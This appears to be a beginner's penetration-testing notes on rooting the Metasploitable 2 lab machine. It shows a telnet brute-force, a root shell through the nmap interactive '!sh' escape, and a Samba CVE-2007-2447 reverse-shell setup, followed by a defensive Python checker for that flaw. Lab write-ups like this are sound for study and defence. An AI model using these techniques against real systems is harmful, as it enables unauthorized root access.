Various methods to own the Metasploitable 2 box
Just started penetration testing; below are the various methods I am using to own the box. Treat this as my personal guidelines and what worked for me rather than a guide or solution for owning the box.
nmap -sV 192.168.1.13
#not the best way but it works
nmap --script telnet-brute 192.168.1.13
#user:user - Valid credentials
#|_ Statistics: Performed 2178 guesses in 603 seconds, average tps: 3
On older nmap versions this works: --interactive accepts !sh, and the resulting shell inherits whatever privileges the nmap binary runs with (root here)
user@metasploitable:~$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
sh-3.2#
Cross-check the SMB version with Metasploit
use scanner/smb/smb_version #reports 3.0.20
This version is vulnerable to the "username map script" command injection (CVE-2007-2447). Just for fun I created a Python script that connects to SMB and drops a reverse ncat payload
https://www.samba.org/samba/security/CVE-2007-2447.html
#open a nc listener on LHOST
nc -vnlp 1337
#configure & run; msfvenom can be used to generate the payload bytes for any reverse shell, e.g. nc
python smb_shell.py #root
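Defensive counterpart, added here and not part of the original notes or of any project's code: a Python check that flags a Samba host as exposed to CVE-2007-2447 only when both conditions hold, a version inside the advisory's affected range (3.0.0 through 3.0.25rc3) and "username map script" set in the [global] section of smb.conf. The smb.conf fragment and the script path inside it are constructed for the demonstration.

```python
import re
# Affected range per the Samba advisory for CVE-2007-2447: 3.0.0 through 3.0.25rc3.
AFFECTED_MIN, FIXED_BASE = (3, 0, 0), (3, 0, 25)   # 3.0.25 final ships the fix

# Constructed smb.conf fragment for the demonstration (not a real host's config).
SAMPLE_CONF = """\
[global]
   ; username map = /etc/samba/smbusers   <- commented out, must be ignored
   username map script = /etc/samba/scripts/mapusers.sh
[homes]
   browseable = no
"""

def parse_version(ver):
    # '3.0.20' -> (3, 0, 20, None); '3.0.25rc3' -> (3, 0, 25, 3)
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", ver.strip())
    if not m:
        raise ValueError("unrecognised Samba version: %r" % ver)
    major, minor, patch, rc = m.groups()
    return int(major), int(minor), int(patch), (int(rc) if rc else None)

def is_affected_version(ver):
    major, minor, patch, rc = parse_version(ver)
    base = (major, minor, patch)
    if base < AFFECTED_MIN or base > FIXED_BASE:
        return False
    if base == FIXED_BASE:            # only the release candidates are affected
        return rc is not None and rc <= 3
    return True

def global_params(conf_text):
    # Key/value pairs of [global] only; keys lower-cased with whitespace collapsed
    section, params = None, {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # smb.conf comment lines
            continue
        if line.startswith("["):
            section = line.strip("[]").strip().lower()
        elif section == "global" and "=" in line:
            key, val = line.split("=", 1)
            params[" ".join(key.lower().split())] = val.strip()
    return params

def assess(ver, conf_text):
    # Exposed only when the version is affected AND the option is configured
    script = global_params(conf_text).get("username map script")
    affected = is_affected_version(ver)
    return {"affected_version": affected, "username map script": script,
            "exposed": affected and bool(script)}
```

Feed it the version reported by smb_version and the host's real /etc/samba/smb.conf; removing the option or upgrading to 3.0.25 or later flips "exposed" to False.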
Buffer overflow Python script: tftp.py